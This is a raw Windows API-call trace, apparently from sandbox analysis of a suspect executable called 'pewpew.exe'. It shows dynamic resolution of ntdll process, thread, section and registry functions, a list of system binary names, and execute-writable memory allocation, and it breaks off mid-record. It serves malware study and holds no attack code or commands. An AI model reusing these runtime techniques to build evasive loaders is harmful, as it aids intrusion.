[0064.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.656] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0064.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.656] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0064.656] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0064.656] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0064.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.822] GetProcAddress (hModule=0x77c40000, lpProcName="ZwClose") returned 0x77c5f9d0 [0064.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.822] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateFile") returned 0x77c600a4 [0064.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.822] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenFile") returned 0x77c5fd54 [0064.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.822] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateSection") returned 0x77c5ff94 [0064.822] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.822] GetProcAddress (hModule=0x77c40000, lpProcName="ZwMapViewOfSection") returned 0x77c5fc40 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSection") returned 0x77c5fc70 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnmapViewOfSectionEx") returned 0x0 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReadFile") returned 0x77c5f8e0 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationFile") returned 0x77c5fa00 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationFile") returned 0x77c5fc28 [0064.823] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.823] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryAttributesFile") returned 0x77c5fe4c [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.824] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySection") returned 0x77c60040 [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.824] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryFullAttributesFile") returned 0x77c6132c [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.824] GetProcAddress (hModule=0x77c40000, lpProcName="ZwWriteFile") returned 0x77c5f918 [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.824] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeviceIoControlFile") returned 0x77c5f8fc [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.824] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryObject") returned 0x77c5f9e8 [0064.824] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.825] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryDirectoryFile") returned 0x77c5fd88 [0064.825] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.825] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenSection") returned 0x77c5fdb8 [0064.825] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.825] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDuplicateObject") returned 0x77c5fe34 [0064.825] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.825] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteFile") returned 0x77c609d4 [0064.825] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.825] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLockFile") returned 0x77c60e44 [0064.826] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.826] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnlockFile") returned 0x77c61ea8 [0064.826] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.826] GetProcAddress (hModule=0x77c40000, lpProcName="ZwTerminateProcess") returned 0x77c5fca0 [0064.826] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.826] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryVolumeInformationFile") returned 0x77c5ff7c [0064.826] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.826] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetVolumeInformationFile") returned 0x77c61c8c [0064.826] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.827] GetProcAddress (hModule=0x77c40000, lpProcName="ZwAccessCheck") returned 0x77c60218 [0064.827] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.827] GetProcAddress (hModule=0x77c40000, lpProcName="ZwExtendSection") returned 0x77c60b0c [0064.827] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.827] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushBuffersFile") returned 0x77c5ffac [0064.827] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.827] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFsControlFile") returned 0x77c5fde8 [0064.827] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.827] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeDirectoryFile") returned 0x77c60f48 [0064.827] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQuerySecurityObject") returned 0x77c61518 [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetSecurityObject") returned 0x77c61b8c [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcess") returned 0x77c60804 [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateProcessEx") returned 0x77c5ffdc [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateUserProcess") returned 0x77c6090c [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.828] GetProcAddress (hModule=0x77c40000, lpProcName="ZwResumeThread") returned 0x77c60058 [0064.828] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateThread") returned 0x77c5fff4 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryInformationProcess") returned 0x77c5fac8 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKey") returned 0x77c5fa18 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwOpenKeyEx") returned 0x77c61008 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateValueKey") returned 0x77c5fa30 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.829] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryKey") returned 0x77c5fa80 [0064.829] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryValueKey") returned 0x77c5fa98 [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwCreateKey") returned 0x77c5fb30 [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwEnumerateKey") returned 0x77c5fd3c [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetValueKey") returned 0x77c601b4 [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteKey") returned 0x77c609ec [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.830] GetProcAddress (hModule=0x77c40000, lpProcName="ZwDeleteValueKey") returned 0x77c60a34 [0064.830] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwFlushKey") returned 0x77c60b70 [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey") returned 0x77c60dfc [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwLoadKey2") returned 0x77c60e14 [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwNotifyChangeKey") returned 0x77c60f60 [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwQueryMultipleValueKey") returned 0x77c6146c [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwReplaceKey") returned 0x77c61738 [0064.831] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.831] GetProcAddress (hModule=0x77c40000, lpProcName="ZwRestoreKey") returned 0x77c617d0 [0064.832] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.832] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSaveKey") returned 0x77c61864 [0064.832] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.832] GetProcAddress (hModule=0x77c40000, lpProcName="ZwSetInformationKey") returned 0x77c61a48 [0064.832] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0064.832] GetProcAddress (hModule=0x77c40000, lpProcName="ZwUnloadKey") returned 0x77c61e60 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28dc*=0x0, psz="tcpsvcs.exe", len=0xb | out: pbstr=0x1f28dc*="tcpsvcs.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28d8*=0x0, psz="ntvdm.exe", len=0x9 | out: pbstr=0x1f28d8*="ntvdm.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28d4*=0x0, psz="dllhost.exe", len=0xb | out: pbstr=0x1f28d4*="dllhost.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28d0*=0x0, psz="replace.exe", len=0xb | out: pbstr=0x1f28d0*="replace.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28cc*=0x0, psz="regsvr32.exe", len=0xc | out: pbstr=0x1f28cc*="regsvr32.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28c8*=0x0, psz="winver.exe", len=0xa | out: pbstr=0x1f28c8*="winver.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28c4*=0x0, psz="help.exe", len=0x8 | out: pbstr=0x1f28c4*="help.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28c0*=0x0, psz="find.exe", len=0x8 | out: pbstr=0x1f28c0*="find.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28bc*=0x0, psz="compact.exe", len=0xb | out: pbstr=0x1f28bc*="compact.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28b8*=0x0, psz="chkdsk.exe", len=0xa | out: pbstr=0x1f28b8*="chkdsk.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28b4*=0x0, psz="attrib.exe", len=0xa | out: pbstr=0x1f28b4*="attrib.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28b0*=0x0, psz="write.exe", len=0x9 | out: pbstr=0x1f28b0*="write.exe") returned 1 [0064.866] SysReAllocStringLen (in: pbstr=0x1f28ac*=0x0, psz="hh.exe", len=0x6 | out: pbstr=0x1f28ac*="hh.exe") returned 1 [0064.866] QueryPerformanceCounter (in: lpPerformanceCount=0x6ef83c | out: lpPerformanceCount=0x6ef83c*=18521619206) returned 1 [0065.034] HeapCreate (flOptions=0x0, dwInitialSize=0x88000, dwMaximumSize=0x88000) returned 0x560000 [0065.107] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x560590 [0065.107] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x570598 [0065.107] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5805a0 [0065.107] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5905a8 [0065.108] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5a05b0 [0065.108] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5b05b8 [0065.108] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5c05c0 [0065.108] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x10000) returned 0x5d05c8 [0065.157] GetDC (hWnd=0x0) returned 0x20109c3 [0065.157] GetDeviceCaps (hdc=0x20109c3, index=12) returned 32 [0065.157] GetDeviceCaps (hdc=0x20109c3, index=14) returned 1 [0065.157] ReleaseDC (hWnd=0x0, hDC=0x20109c3) returned 1 [0065.158] LoadStringA (in: hInstance=0xd0000, uID=0xfeea, lpBuffer=0x6ef420, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0065.175] LoadStringA (in: hInstance=0xd0000, uID=0xff43, lpBuffer=0x6ef3c0, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9 [0065.175] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3 [0065.175] LoadStringA (in: hInstance=0xd0000, uID=0xff44, lpBuffer=0x6ef3c0, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12 [0065.175] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3 [0065.175] LoadStringA (in: hInstance=0xd0000, uID=0xff45, lpBuffer=0x6ef3c0, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5 [0065.175] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3 [0065.175] LoadStringA (in: hInstance=0xd0000, uID=0xff46, lpBuffer=0x6ef3c0, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7 [0065.175] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3 [0065.176] CharLowerBuffA (in: lpsz="jpeg", cchLength=0x4 | out: lpsz="jpeg") returned 0x4 [0065.176] LoadStringA (in: hInstance=0xd0000, uID=0xfeea, lpBuffer=0x6ef420, cchBufferMax=1024 | out: lpBuffer="JPEG Image File") returned 0xf [0065.176] CharLowerBuffA (in: lpsz="jpg", cchLength=0x3 | out: lpsz="jpg") returned 0x3 [0065.226] CharLowerBuffA (in: lpsz="PNG", cchLength=0x3 | out: lpsz="png") returned 0x3 [0065.276] VirtualAlloc (lpAddress=0x2284000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x40) returned 0x2284000 [0065.381] GetModuleFileNameW (in: hModule=0xc0000, lpFilename=0xb0b8fc, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe")) returned 0x30 [0065.382] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ef454, lpFilePart=0x6ef450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ef450*="pewpew.exe") returned 0x30 [0065.382] SysReAllocStringLen (in: pbstr=0x22827a0*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x22827a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0065.382] SysReAllocStringLen (in: pbstr=0x6ef738*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef738*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0065.382] GetThreadLocale () returned 0x409 [0065.382] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.454] GetThreadLocale () returned 0x409 [0065.454] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.454] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", lpFilePart=0x6ef400*="pewpew.exe") returned 0x30 [0065.454] SysReAllocStringLen (in: pbstr=0x6ef738*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef738*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef630*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe") returned 1 [0065.455] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", cchLength=0x30 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 0x30 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef738*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x6ef738*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x22827a0*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\pewpew.exe", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe", len=0x30 | out: pbstr=0x22827a0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\pewpew.exe") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x22827b0*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x22827b0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef72c*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x6ef72c*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef730*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x6ef730*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.455] GetThreadLocale () returned 0x409 [0065.455] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.455] GetThreadLocale () returned 0x409 [0065.455] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.455] GetFullPathNameW (in: lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", lpFilePart=0x6ef400*=0x0) returned 0x26 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef730*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x6ef730*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.455] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x6ef630*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.456] CharLowerBuffW (in: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", cchLength=0x26 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 0x26 [0065.456] SysReAllocStringLen (in: pbstr=0x6ef730*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x6ef730*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.456] SysReAllocStringLen (in: pbstr=0x22827b0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", psz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\", len=0x26 | out: pbstr=0x22827b0*="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\") returned 1 [0065.456] VirtualAlloc (lpAddress=0x2294000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x40) returned 0x2294000 [0065.457] GetSystemDirectoryW (in: lpBuffer=0x2291da8, uSize=0xfffe | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef724*=0x0, psz="C:\\Windows\\system32", len=0x13 | out: pbstr=0x6ef724*="C:\\Windows\\system32") returned 1 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef728*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x6ef728*="C:\\Windows\\system32\\") returned 1 [0065.457] GetThreadLocale () returned 0x409 [0065.457] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.457] GetThreadLocale () returned 0x409 [0065.457] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Windows\\system32\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Windows\\system32\\", lpFilePart=0x6ef400*=0x0) returned 0x14 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef728*="C:\\Windows\\system32\\", psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x6ef728*="C:\\Windows\\system32\\") returned 1 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef630*=0x0, psz="C:\\Windows\\system32\\", len=0x14 | out: pbstr=0x6ef630*="C:\\Windows\\system32\\") returned 1 [0065.457] CharLowerBuffW (in: lpsz="C:\\Windows\\system32\\", cchLength=0x14 | out: lpsz="c:\\windows\\system32\\") returned 0x14 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef728*="C:\\Windows\\system32\\", psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x6ef728*="c:\\windows\\system32\\") returned 1 [0065.457] SysReAllocStringLen (in: pbstr=0x22827ac*=0x0, psz="c:\\windows\\system32\\", len=0x14 | out: pbstr=0x22827ac*="c:\\windows\\system32\\") returned 1 [0065.457] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x2291da8 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef718*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef718*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.457] SysReAllocStringLen (in: pbstr=0x6ef71c*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.458] GetThreadLocale () returned 0x409 [0065.458] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0065.458] GetThreadLocale () returned 0x409 [0065.458] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0065.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x6ef404, lpFilePart=0x6ef400 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFilePart=0x6ef400*=0x0) returned 0x25 [0065.458] SysReAllocStringLen (in: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef71c*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.458] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x6ef14c, lpFilePart=0x6ef148 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFilePart=0x6ef148*=0x0) returned 0x25 [0065.458] SysReAllocStringLen (in: pbstr=0x6ef38c*=0x0, psz="C:", len=0x2 | out: pbstr=0x6ef38c*="C:") returned 1 [0065.458] SysReAllocStringLen (in: pbstr=0x6ef348*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x6ef348*="C:\\") returned 1 [0065.458] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0065.458] SysReAllocStringLen (in: pbstr=0x6ef344*=0x0, psz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x6ef344*="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 1 [0065.458] CharLowerBuffW (in: lpsz="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrg~1\\appdata\\local\\temp\\") returned 0x25 [0065.458] SetLastError (dwErrCode=0x0) [0065.458] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\5p5nrg~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0065.458] GetLastError () returned 0x0 [0065.458] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpFindFileData=0x6ef3b0 | out: lpFindFileData=0x6ef3b0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x6ef3d0, ftLastAccessTime.dwLowDateTime=0x76e44557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0xb0c08c, ftLastWriteTime.dwHighDateTime=0x6ef3e8, nFileSizeHigh=0x76e44628, 